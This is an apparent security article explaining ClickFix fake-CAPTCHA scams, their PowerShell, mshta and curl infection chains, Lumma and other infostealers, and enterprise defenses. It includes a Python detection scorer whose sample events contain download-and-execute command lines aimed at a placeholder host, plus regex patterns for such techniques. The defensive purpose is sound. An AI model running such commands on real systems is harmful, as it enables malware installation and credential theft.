In an era dominated by digital convenience and browser security mechanisms, threat actors have found a way to weaponize familiar trust interfaces. The fake CAPTCHA scam—often delivered via ClickFix campaigns—tricks users into executing malicious code, bypassing traditional web defenses.
Online security checks are designed to protect users from automated bots and malicious actors, but cybercriminals have found a way to weaponize these familiar interfaces. A rising social engineering threat known as the fake CAPTCHA scam—often distributed through ClickFix campaigns—mimics legitimate verification screens to compromise devices. By exploiting the user's trust and verification fatigue, attackers trick victims into executing malicious payloads themselves, bypassing browser-based security filters. Legitimate verification systems operate inside sandbox boundaries, but fake prompts seek to break out of the browser by requesting manual OS interactions.
This sophisticated campaign represents a significant shift in the tactics of modern info-stealers. Historically, malware relied on software exploits or malicious downloads hidden behind email attachments. With fake CAPTCHA scams, threat actors rely on human-assisted execution to run obfuscated scripts. The victim is instructed to copy a command to their clipboard and paste it into their system's Run dialog or Terminal to "verify" their identity. Because this execution is initiated by the user, the operating system treats it as an authorized administrative action.
Once executed, these commands download powerful infostealers like Lumma Stealer and Rhadamanthys, which harvest saved passwords, session cookies, and cryptocurrency wallets. The scale of this campaign is staggering, with security firms detecting hundreds of thousands of infections worldwide. The success of this tactic lies in its ability to exploit built-in operating system utilities, making the malicious activity appear legitimate to security software. The fileless nature of the initial download makes detection highly difficult for signature-based antivirus scanners.
To protect individuals and organizations, it is critical to understand the mechanics of this social engineering campaign, the payloads it delivers, and the mitigation strategies available. Analyzing the difference in tactics between Windows and macOS targets reveals the adaptability of modern threat actors, showing that user education is our most vital defense.
- Social Engineering Vector: ClickFix campaigns present users with fake Cloudflare or ReCAPTCHA verification panels that copy malicious payloads.
- Execution Mechanics: Victims are socially engineered to press Windows+R, paste the clipboard content, and hit Enter, running scripts manually.
- Malware Payloads: Executing the PowerShell script installs infostealers like Lumma Stealer or Rhadamanthys, harvesting session tokens and browser credentials.
- Dark Web Economy: Lumma Stealer is distributed under a Malware-as-a-Service model, with entry-tier subscriptions costing $250 per month.
- macOS Targeting: The campaign has adapted to macOS, directing users to paste curl scripts into the Terminal to bypass Gatekeeper.
The Deceptive Verification: How Fake CAPTCHAs Hijack the Clipboard
The infection chain begins when a user visits a compromised website or clicks a malicious advertisement. These pages are often distributed through search engine optimization poisoning, targeting users looking for cracked software, media players, or browser extensions. Upon loading the page, the user is blocked by a screen that mimics legitimate services like Cloudflare or Google ReCAPTCHA, displaying a "Verify you are human" prompt. This prompt is designed to create urgency and exploit the user's habit of clicking through security checks.
When the user clicks the "Verify" button, a malicious JavaScript script runs silently in the background, copying an obfuscated command to the system's clipboard. The website then displays a set of instructions, explaining that a temporary verification process is required to proceed. The user is instructed to press a key combination—typically Windows Key + R—paste the contents of the clipboard using Ctrl + V, and press Enter. The site uses detailed visual animations to guide the user through this process, minimizing suspicion.
To identify these fake prompts, users should look out for several key indicators of a clipboard attack:
- Manual Execution Request: Prompts asking you to press system hotkeys like Windows+R or launch Terminal.
- Clipboard Interaction: Buttons that silently copy code to your clipboard instead of resolving a challenge.
- Deceptive Domain Names: Web addresses that mimic legitimate security providers but feature spelling errors.
Because legitimate CAPTCHAs never require manual command execution, this prompt is a major red flag. However, many users, accustomed to clicking through security warnings, follow the steps without realizing they are running code. The script copied to the clipboard is a heavily encoded PowerShell command designed to launch the next stage of the attack. By involving the user, attackers bypass browser warnings that flag executable file downloads.
Clipboard hijacking allows attackers to bridge the gap between the web browser and the operating system. By convincing the user to manually copy and paste the payload, the malware avoids browser security controls that block automatic file downloads, making it a highly successful delivery vector.
The Windows Infection Chain: PowerShell, Lolbins, and Memory Injection
On Windows devices, the fake CAPTCHA scam relies on PowerShell to execute the malicious script and download the final payload. When the user pastes the command into the Run dialog, the system launches PowerShell with the user's current privileges. The pasted script is typically a long, single-line command containing obfuscated code designed to bypass the Antimalware Scan Interface (AMSI). This obfuscation prevents simple script scanners from identifying the malicious download links embedded within the command.
The script uses living-off-the-land binaries (Lolbins)—built-in Windows tools that are trusted by default—to download and run the malware. By abusing legitimate utilities like `mshta.exe` or `certutil.exe`, the command can connect to a remote command-and-control server without triggering security alerts. The script downloads a secondary payload, which is often a heavily obfuscated dynamic link library (DLL) or executable file. This file represents the primary loader module of the info-stealer.
The secondary execution phase utilizes specific scripting methodologies to ensure high stealth on the target host:
- Base64 Obfuscation: Encoded command strings that hide download URLs from static security checkers.
- In-Memory Execution: Loading malicious dynamic link libraries (DLLs) directly into RAM via hollowed processes.
- Defender Disabling: Commands designed to turn off local system antivirus components if run as administrator.
The secondary payload then executes in the system's memory, using techniques like process hollowing to inject the malware into a legitimate system process. By running in memory rather than writing files to the disk, the malware minimizes its footprint and evades detection by basic antivirus scanners. This fileless execution model allows the info-stealer to operate quietly in the background while harvesting sensitive data. Security teams must monitor memory allocation anomalies to detect this presence.
The use of PowerShell also allows the script to disable local security controls or clear event logs, hindering forensic investigation. If the user is logged in with administrative privileges, the script can modify registry settings, add persistent registry keys, or disable Windows Defender. This access level makes it critical for organizations to enforce least-privilege access and restrict scripting privileges for all non-administrative accounts inside the corporate network.
Understanding this infection chain reveals why traditional, signature-based defenses are often ineffective against ClickFix campaigns. The attack does not rely on a known exploit, but rather on the legitimate behavior of built-in system tools driven by the user. Defending against these attacks requires behavior-based detection tools that can identify suspicious PowerShell execution patterns and unauthorized clipboard access, warning users of potential danger before the script launches.
Context: Living-off-the-Land (LotL) attacks represent a method where threat actors abuse pre-installed, legitimate system utilities (like PowerShell or Terminal) to download and run malware. Because these utilities are trusted by the operating system, their execution rarely triggers default security warnings, shifting the burden of detection to behavioral monitoring tools.
Expanding the Target: ClickFix Tactics Targeting macOS Terminal
While ClickFix campaigns initially focused on Windows users, threat actors have expanded their tactics to target macOS systems. The macOS version of the fake CAPTCHA scam follows a similar social engineering logic but adapts the instructions for Apple's operating system. When a macOS user visits a compromised page, they are presented with a prompt asking them to copy a Terminal command. The graphic interface is styled to resemble an official Apple security check, building instant trust.
The instructions direct the user to open the Terminal utility using Spotlight Search, paste the copied string, and press Enter. This command is typically a shell script that downloads a malicious package containing macOS-specific infostealers, such as Atomic Stealer or MacSync. Once executed, the script prompts the user for their system password to install the payload. By entering their password, the user grants the script administrative privileges, allowing it to modify system files.
The execution of the Terminal command allows the malware to bypass macOS Gatekeeper, a security feature designed to block unsigned software from running. Because the user manually pasted the script into the Terminal, macOS treats the command as authorized, permitting the download and installation of the stealer. This tactic demonstrates that non-Windows platforms are equally vulnerable to clipboard-based attacks, proving that platform security is only as strong as user vigilance.
Once installed, the macOS infostealer targets the system Keychain, which stores saved passwords, secure notes, and encryption keys. The malware also scans browser profiles to extract cookies, autofill data, and cryptocurrency wallet files. The harvested data is compressed and exfiltrated to the attacker's server, allowing them to bypass multi-factor authentication (MFA) using stolen session tokens. This allows attackers to compromise corporate accounts even without knowing the primary password.
The adaptation of ClickFix for macOS highlights the cross-platform nature of modern cyber threats. Attackers recognize that many users assume macOS is immune to malware, making them less cautious when presented with unusual Terminal prompts. Educating Apple users that legitimate websites will never ask them to paste commands into the Terminal is essential for stopping this campaign, showing that user education must be updated to cover all operating environments.
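As an added example, not code from the original article or from any vendor named in it, the following Python scorer applies the behavioral heuristics described in the Windows and macOS sections to constructed process-creation records (parent, image, command line, as Sysmon or Security 4688 events would supply). It decodes a `-EncodedCommand` payload before scanning it, weights indicators such as a hidden window, execution-policy bypass, Lolbin downloaders and curl piped into a shell, and adds a point when the shell was launched from the Run dialog or Terminal. The indicator weights, the sample records and the `example.invalid` hosts are assumptions made for this example.

```python
import base64
import re

# Constructed sample process-creation records (Sysmon/4688 style); not real telemetry.
_ENC_PAYLOAD = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/v.txt')"
    .encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "image": "powershell.exe",  # Win+R -> hidden, encoded PowerShell
     "cmdline": f"powershell.exe -w hidden -nop -ep bypass -enc {_ENC_PAYLOAD}"},
    {"parent": "explorer.exe", "image": "powershell.exe",  # benign use of the Run dialog
     "cmdline": "powershell.exe -Command Get-Process"},
    {"parent": "explorer.exe", "image": "mshta.exe",  # Lolbin fetching a remote file
     "cmdline": "mshta.exe http://example.invalid/verify.hta"},
    {"parent": "Terminal", "image": "bash",  # macOS variant: curl piped into a shell
     "cmdline": 'bash -c "curl -fsSL http://example.invalid/i.sh | sh"'},
]
# Weighted indicators (regex, weight, label). Weights are assumed tuning, not vendor rules.
INDICATORS = [
    (r"(?i)-w(?:indowstyle)?\s+hidden", 2, "hidden window"),
    (r"(?i)-e(?:p|xecutionpolicy)\s+bypass", 2, "execution policy bypass"),
    (r"(?i)\b(?:iex|invoke-expression)\b", 3, "dynamic code evaluation"),
    (r"(?i)downloadstring|invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b", 2, "remote fetch"),
    (r"(?i)\bmshta\.exe|certutil(?:\.exe)?\s+-urlcache", 3, "lolbin downloader"),
    (r"(?i)https?://", 1, "URL in command line"),
    (r"\|\s*(?:sh|bash|zsh)\b", 3, "piped to shell"),
    (r"base64\s+(?:-d|--decode)", 2, "base64 decode"),
]
_ENC_RE = re.compile(r"(?i)-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})")

def decode_encoded_command(cmdline):
    """Return the UTF-16LE text behind -enc/-EncodedCommand, or None if absent or invalid."""
    try:
        m = _ENC_RE.search(cmdline)
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le") if m else None
    except (ValueError, UnicodeDecodeError):
        return None

def score_event(ev):
    """Score one record; returns (score, reasons). The decoded payload is scanned as well."""
    decoded = decode_encoded_command(ev["cmdline"])
    text = _ENC_RE.sub(lambda _: " " + decoded, ev["cmdline"]) if decoded else ev["cmdline"]
    score, reasons = (2, ["encoded command"]) if decoded else (0, [])
    for pattern, weight, label in INDICATORS:
        if re.search(pattern, text):
            score += weight
            reasons.append(label)
    if ev["parent"].lower() in ("explorer.exe", "terminal"):  # user-launched: ClickFix hallmark
        score += 1
        reasons.append("shell launched by the user from Run dialog/Terminal")
    return score, reasons

def flag_clickfix(events, threshold=5):
    """Return (event, score, reasons) for every record whose score reaches the threshold."""
    return [row for row in ((ev, *score_event(ev)) for ev in events) if row[1] >= threshold]
```

The benign `Get-Process` launch scores only the single "user-launched" point, so it stays below the threshold while the encoded PowerShell, the `mshta.exe` fetch and the `curl | sh` one-liner are all flagged with their reasons listed.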
“The genius of ClickFix is that it doesn't exploit code; it exploits human trust. By mimicking a security verification step, it tricks the user into becoming the loader, rendering traditional browser sandboxes completely ineffective.”
— Security Research Team, SentinelOne Security Advisory, May 2026
Inside Lumma Stealer: Subscription Economics and Harvested Data
The primary payload delivered by fake CAPTCHA scams is Lumma Stealer, a prominent "Malware-as-a-Service" (MaaS) infostealer sold on dark web forums and Telegram channels. Lumma operates on a tiered subscription model, with monthly prices starting at $250 for standard access. Higher-tier subscriptions, which can cost up to $20,000, provide access to the source code, allowing buyers to act as resellers. This commercial structure lowers the barrier to entry for aspiring cybercriminals.
Lumma Stealer is designed to be highly efficient and stealthy, targeting a wide range of sensitive data on the victim's device. The malware dynamically locates and extracts data from over 10 popular web browsers, including Google Chrome, Mozilla Firefox, Microsoft Edge, and Brave. It targets browser-stored credentials, credit card numbers, autofill forms, and search histories, packaging the data into structured zip archives for exfiltration back to the C2 panel.
In addition to browser data, Lumma Stealer targets cryptocurrency assets, scanning the device for over 70 popular wallet extensions and desktop applications. It extracts wallet configuration files, private keys, and seed phrases, allowing attackers to drain funds from the victim's account. This focus on crypto assets makes the stealer highly profitable for threat actors, as they can instantly monetize the infection without needing to resell credentials.
To compare the main info-stealers in circulation in 2026, security analysts line up their key parameters:
- Lumma Stealer: Standard monthly price is $250; targets 10+ browsers and 70+ crypto wallet extensions.
- Rhadamanthys: Sophisticated modular stealer costing $160/month; features advanced memory evasion capabilities.
- Atomic Stealer: Dedicated macOS stealer costing $1,000/month; targets system Keychain and Apple browser profiles.
- RedLine: Legacy stealer now declining due to developer leaks; relies on static signature files.
The malware also harvests session cookies to bypass multi-factor authentication (MFA). By stealing active browser session cookies, attackers can clone the victim's active session and gain direct account access without needing passwords or 2FA codes, completely undermining traditional perimeter security defenses.
The scale of Lumma's operations is immense, with researchers identifying over 394,000 global infections between March and May 2025. In late 2024, Lumma accounted for over 50% of all stealer logs sold on the Russian dark web, demonstrating its dominance in the credential exfiltration market.
The economics of Lumma Stealer create a self-sustaining cycle of cybercrime. The low barrier to entry of a $250 subscription allows novice criminals to launch campaigns. The profits generated fund further malware updates, ensuring info-stealers remain a persistent global threat, requiring coordinated responses from security providers.
“Legitimate security checks will never ask you to open your Run dialog, paste scripts, or launch Terminal utilities. If a website requires manual command execution to prove you are human, close it immediately.”
— Consumer Protection Advisory, Federal Trade Commission (FTC), June 2026
Enterprise Mitigation: Defending Against Clipboard Social Engineering
Defending against fake CAPTCHA scams requires a multi-layered security strategy that combines user training with technical controls. Because the attack relies on the user executing the command, educating employees about this tactic is the first line of defense. Security awareness programs should emphasize that legitimate websites will never require users to copy and paste code to verify their identity, helping users identify fake prompts before they interact with them.
To establish a robust defensive posture, security administrators should implement a structured mitigation pathway:
- Group Policy Restriction: Restrict PowerShell execution policies using Group Policy Objects or Intune to prevent unsigned script execution.
- Endpoint Hardening: Disable the Windows Run dialog (`Win+R`) and restrict standard user privileges to block administrative command execution.
- Behavioral Monitoring: Configure EDR rules to flag suspicious clipboard modifications and detect Lolbin processes calling remote servers.
From a technical perspective, organizations should restrict PowerShell execution policies using Group Policy Objects or Microsoft Intune. By limiting the ability of standard users to run PowerShell scripts, administrators can block the infection chain even if an employee falls for the scam. Disabling the Run dialog (`Windows Key + R`) for non-administrative users can also mitigate the risk, preventing the initial script insertion from launching the default shell environment.
Endpoint Detection and Response (EDR) tools should be configured to monitor for suspicious PowerShell command lines, especially those containing obfuscated strings, Base64 encoding, or references to known Lolbins. Monitoring for unauthorized clipboard activity and clipboard history modifications can also help detect hijacking attempts before the command is executed, alerting security teams of a potential compromise in real time.
Finally, implementing a robust credential management policy can limit the impact of a successful infection. Encouraging the use of dedicated password managers rather than browser-based storage makes it harder for info-stealers to harvest credentials. Using hardware-bound multi-factor authentication (MFA), such as security keys, can protect accounts even if session cookies are stolen, preventing unauthorized access to critical corporate resources.
| Malware Family | Primary OS Target | Stealer Log Market Share | Risk Status |
|---|---|---|---|
| Lumma Stealer | Windows / macOS | 52% (November 2024) | ▲ Leading |
| Rhadamanthys | Windows | 20% (November 2024) | ≈ Parity |
| Atomic Stealer | macOS | 12% (November 2024) | ≈ Parity |
| RedLine | Windows | 6% (November 2024) | ▼ Behind |
Conclusion: The Evolution of Clipboard-Based Attacks
The fake CAPTCHA scam represents a sophisticated evolution in social engineering, combining familiar security interfaces with clipboard hijacking to bypass traditional defenses. The success of ClickFix campaigns and the widespread distribution of Lumma Stealer highlight the need for organizations and individuals to remain vigilant. By combining user education with strict technical controls like PowerShell restrictions and EDR monitoring, we can protect our systems from these deceptive tactics and ensure our data remains secure, stopping info-stealers at the doorstep.
Sources and References
- Federal Trade Commission (FTC) - Consumer Advice on Spotting CAPTCHA Scams (Published June 8, 2026): ftc.gov
- SentinelOne - Behavioral Threat Advisory on ClickFix Clipboard Injection Techniques: sentinelone.com
- Microsoft Threat Intelligence Center (MSTIC) - LummaC2 Stealer Infection and MaaS Metrics: microsoft.com
- Proofpoint - Threat Research on Social Engineering Trends and Human-Assisted Loader Campaigns: proofpoint.com